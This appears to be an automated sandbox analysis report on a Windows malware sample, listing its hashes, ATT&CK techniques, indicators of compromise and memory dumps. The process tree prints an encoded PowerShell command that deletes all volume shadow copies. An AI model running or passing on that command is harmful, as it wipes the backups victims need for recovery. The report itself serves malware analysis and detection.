ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b

General

Target

ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
Size

164KB
MD5

85edb2d3679069c14a745d32a06aadc2
SHA1

a940552eedff6ffc2565c10fc9445b5fc5ac2960
SHA256

ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b
SHA512

40dbe54a72fef2ff455a6a4a603c1134d3c178f50afa06bef3c6360117db10d30bdd3b83d85fdd216cf642991cab01ffdf16b6398bb45fd8a97d0d21f905eeae

Score

6^/10

Malware Config

Signatures

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe

description	ioc	process
File opened (read-only)	\??\J:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\L:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\M:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\O:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\T:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\E:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\H:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\I:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\N:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\F:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\Q:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\S:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\V:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\Y:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\Z:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\P:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\B:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\G:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\K:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\R:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\U:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\W:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\X:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened (read-only)	\??\A:	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe

Drops file in Windows directory 64 IoCs

Processes:

ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe

description	ioc	process
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-c..vider-dll.resources_31bf3856ad364e35_6.1.7600.16385_es-es_aa8c8b00989fc5d5.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..ineclient.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_7b614a5dfbb391be.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-shell32.resources_31bf3856ad364e35_6.1.7601.17514_fr-fr_fe3403682a16c506.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..isc-tools.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_6e0c114cf82ecf59_netmsg.dll.mui_ab0f7c73	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-n..-domain-clients-svc_31bf3856ad364e35_6.1.7601.17514_none_a2347d4102a4c8ad_polstore.dll_6cd3e56e	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-v..skservice.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_2cd61650c375bd11_vdsutil.dll.mui_0caf9b0e	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-eventlog-api.resources_31bf3856ad364e35_6.1.7600.16385_es-es_237853bab8fdf2b4.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-hbaapi.resources_31bf3856ad364e35_6.1.7600.16385_es-es_903ffeafc5a64100_hbaapi.mfl_4e36195e	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-i..eprotocol.resources_31bf3856ad364e35_6.1.7600.16385_es-es_144ec08914537b72.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-u..dem-voice.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_9051caac08fc9eb2.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-activexproxy_31bf3856ad364e35_6.1.7601.17514_none_703438df00e9e0d7_actxprxy.dll_82133921	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-system_31bf3856ad364e35_6.1.7600.16385_none_df4bbe8e10903104_8514sys.fon_bcc6c556	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-dns-client.resources_31bf3856ad364e35_6.1.7600.16385_es-es_231366a72d1cda71_dnsapi.dll.mui_97465f8a	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..isc-tools.resources_31bf3856ad364e35_6.1.7600.16385_es-es_3f0725fa3b0fc19e.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-uxtheme.resources_31bf3856ad364e35_6.1.7600.16385_en-us_7214f10d6056e81a_uxtheme.dll.mui_15ce9297	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-htmlhelp_31bf3856ad364e35_6.1.7600.16385_none_2e9f92abd2ce43b6_hhsetup.dll_37c1de59	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-uxtheme.resources_31bf3856ad364e35_6.1.7600.16385_es-es_15c1b26da8206889_uxtheme.dll.mui_15ce9297	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-f..-truetype-aparajita_31bf3856ad364e35_6.1.7601.17514_none_d123c185ad71f4d5_aparajb.ttf_caad65b5	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-tcpip.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_5707b336a41b04a4_tcpip.sys.mui_5885771c	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-i..tional-codepage-852_31bf3856ad364e35_6.1.7600.16385_none_2add00d6b4e2da5c_c_852.nls_bb0fdbcc	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-x..nrollment.resources_31bf3856ad364e35_6.1.7600.16385_es-es_a946f0dddb83d182_certenrollctrl.exe.mui_3b48c5a6	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-e..rtingcore.resources_31bf3856ad364e35_6.1.7600.16385_es-es_02b53e1d98470ee8_wer.dll.mui_e68ddae7	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-b..nager-efi.resources_31bf3856ad364e35_6.1.7600.16385_zh-tw_3e4f8e47e730ab98_bootmgr.efi.mui_be5d0075	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-d..owmanager.resources_31bf3856ad364e35_6.1.7600.16385_es-es_05b98a45d5a86346_dwm.exe.mui_706e052f	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-rpc-kernel_31bf3856ad364e35_6.1.7601.17514_none_1d32894498861e30_msrpc.sys_2e252236	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-a..on-authui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_8b1e4a75fe840204.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-i..er-engine.resources_31bf3856ad364e35_6.1.7601.17514_it-it_d5d42323872d6f8c_msimsg.dll.mui_72e8994f	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-m..ditevtlog.resources_31bf3856ad364e35_6.1.7600.16385_es-es_59a756fabb56ede3_msobjs.dll.mui_d054e07b	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-dns-client.resources_31bf3856ad364e35_6.1.7600.16385_en-us_18f35f70f89526d1_dnsapi.dll.mui_97465f8a	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-font-bitmap-small_31bf3856ad364e35_6.1.7600.16385_none_d7839341959a2de0_smallfg.fon_f49c104b	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-mfc42x.resources_31bf3856ad364e35_6.1.7600.16385_de-de_1987390f017a5bf9_mfc42u.dll.mui_64d23330	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-msvcrt_31bf3856ad364e35_6.1.7600.16385_none_d12b8c440039b31e_msvcrt.dll_ee71f3d5	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-advapi32.resources_31bf3856ad364e35_6.1.7600.16385_de-de_cb8d93e1dba7ea79.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-b..d-bootfix.resources_31bf3856ad364e35_6.1.7600.16385_es-es_f5c532dcc8fdb89b.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-coreusermodepnp_31bf3856ad364e35_6.1.7601.17514_none_df7c5af777ec4541_drvinst.exe_6593e92a	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-msxml60.resources_31bf3856ad364e35_6.1.7600.16385_es-es_3ba84b2bd59394c1_msxml6r.dll.mui_4516d602	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-a..on-authui.resources_31bf3856ad364e35_6.1.7600.16385_en-us_8b52ed91fe5d105f.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-comctl32-v5.resources_31bf3856ad364e35_6.1.7600.16385_uk-ua_8ca949062551c8d6_comctl32.dll.mui_0da4e682	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-networkbridge_31bf3856ad364e35_6.1.7600.16385_none_63dee2821fc69fce_microsoft-windows-networkbridge-ppdlic.xrm-ms_1a466ea5	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-standardvga_31bf3856ad364e35_6.1.7600.16385_none_f881232cf3b0c322_framebuf.dll_3e9737b8	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..entication-usermode_31bf3856ad364e35_6.1.7600.16385_none_39f81956d5a8018f_ntmarta.dll_cd048e61	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-uxtheme.resources_31bf3856ad364e35_6.1.7600.16385_de-de_6d057f90b91b6b1f.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-wintrust-dll_31bf3856ad364e35_6.1.7601.17514_none_f1b5a3b0f852fe0e_wintrust.dll_abec426a	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-e..orerframe.resources_31bf3856ad364e35_6.1.7600.16385_de-de_067ccc311d759f4f_explorerframe.dll.mui_074caeb5	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-s..ive-blackbox-loader_31bf3856ad364e35_6.1.7600.16385_none_c72819e06acceb59.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-searchfolder.resources_31bf3856ad364e35_6.1.7600.16385_en-us_7d2dc7126d5af514_searchfolder.dll.mui_8c30bdaf	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-a..on-authui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_e73ce5f9b6e1733a.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-p..structure.resources_31bf3856ad364e35_6.1.7601.17514_en-us_cd970b6106ea9e70.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-com-base.resources_31bf3856ad364e35_6.1.7600.16385_es-es_b8216f269f23254c_oleres.dll.mui_ff00d4cb	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-wininit.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_e7beb9cc5ed3e31f_wininit.exe.mui_997435f5	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-grouppolicy-base_31bf3856ad364e35_6.1.7600.16385_none_8e6cfdd835146ea7.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-i..i_initiator_service_31bf3856ad364e35_6.1.7601.17514_none_42ee5aff60183c81_iscsied.dll_e933fb0e	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-mlang_31bf3856ad364e35_6.1.7600.16385_none_b2d43d1ffdaf54e6_mlang.dat_211debd0	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-ucrt_31bf3856ad364e35_6.1.7601.18972_none_09a44b6a3051f6fe.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-s..subsystem.resources_31bf3856ad364e35_6.1.7600.16385_de-de_4aab526590e1172b_certprop.dll.mui_602eaab4	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-w..r-webclnt.resources_31bf3856ad364e35_6.1.7600.16385_es-es_3f0ca7963218dd9e_webclnt.dll.mui_e8f04040	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-c..integrity.resources_31bf3856ad364e35_6.1.7600.16385_fr-fr_f7ac452b5a04955b_ci.dll.mui_76757f43	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-credui_31bf3856ad364e35_6.1.7601.17514_none_395d5230a58cfe49_credui.dll_c0e5bbea	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\amd64_microsoft-windows-x..ollmentui.resources_31bf3856ad364e35_6.1.7600.16385_es-es_949ca950b4247d26.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-m..ents-mdac.resources_31bf3856ad364e35_6.1.7600.16385_de-de_8f1e1b0781b835e8.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\wow64_microsoft-windows-p..structure.resources_31bf3856ad364e35_6.1.7600.16385_de-de_227521a01b1e0f11.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-b..ager-pcat.resources_31bf3856ad364e35_6.1.7600.16385_pl-pl_1ea06bbff56ef9c1.manifest	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-d..lient-dll.resources_31bf3856ad364e35_6.1.7600.16385_es-es_5588b35e1b8aed89_dhcpcore.dll.mui_8b901fc3	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
File opened for modification	C:\Windows\winsxs\Backup\x86_microsoft-windows-hbaapi.resources_31bf3856ad364e35_6.1.7600.16385_ja-jp_bf44ea0282c54ebb_hbaapi.mfl_4e36195e	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exepowershell.exe

pid process

1888 ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
576 powershell.exe

pid	process
1888	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
576	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	576	powershell.exe
Token: SeBackupPrivilege	1080	vssvc.exe
Token: SeRestorePrivilege	1080	vssvc.exe
Token: SeAuditPrivilege	1080	vssvc.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe

description	pid	process	target process
PID 1888 wrote to memory of 576	1888	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe	powershell.exe
PID 1888 wrote to memory of 576	1888	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe	powershell.exe
PID 1888 wrote to memory of 576	1888	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe	powershell.exe
PID 1888 wrote to memory of 576	1888	ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe
"C:\Users\Admin\AppData\Local\Temp\ece4c1e4c72a361db47c69df061a2aeccddb5dba17d8fb1eff6cad0a67975b2b.exe"
1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:576

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:1464

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1080

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/576-55-0x000007FEFC511000-0x000007FEFC513000-memory.dmp

Filesize
8KB

Download
memory/576-57-0x00000000028A0000-0x00000000028A2000-memory.dmp

Filesize
8KB

Download
memory/576-58-0x00000000028A2000-0x00000000028A4000-memory.dmp

Filesize
8KB

Download
memory/576-59-0x00000000028A4000-0x00000000028A7000-memory.dmp

Filesize
12KB

Download
memory/576-56-0x000007FEF38E0000-0x000007FEF443D000-memory.dmp

Filesize
11.4MB

Download
memory/576-60-0x00000000028AB000-0x00000000028CA000-memory.dmp

Filesize
124KB

Download
memory/1888-54-0x0000000076071000-0x0000000076073000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads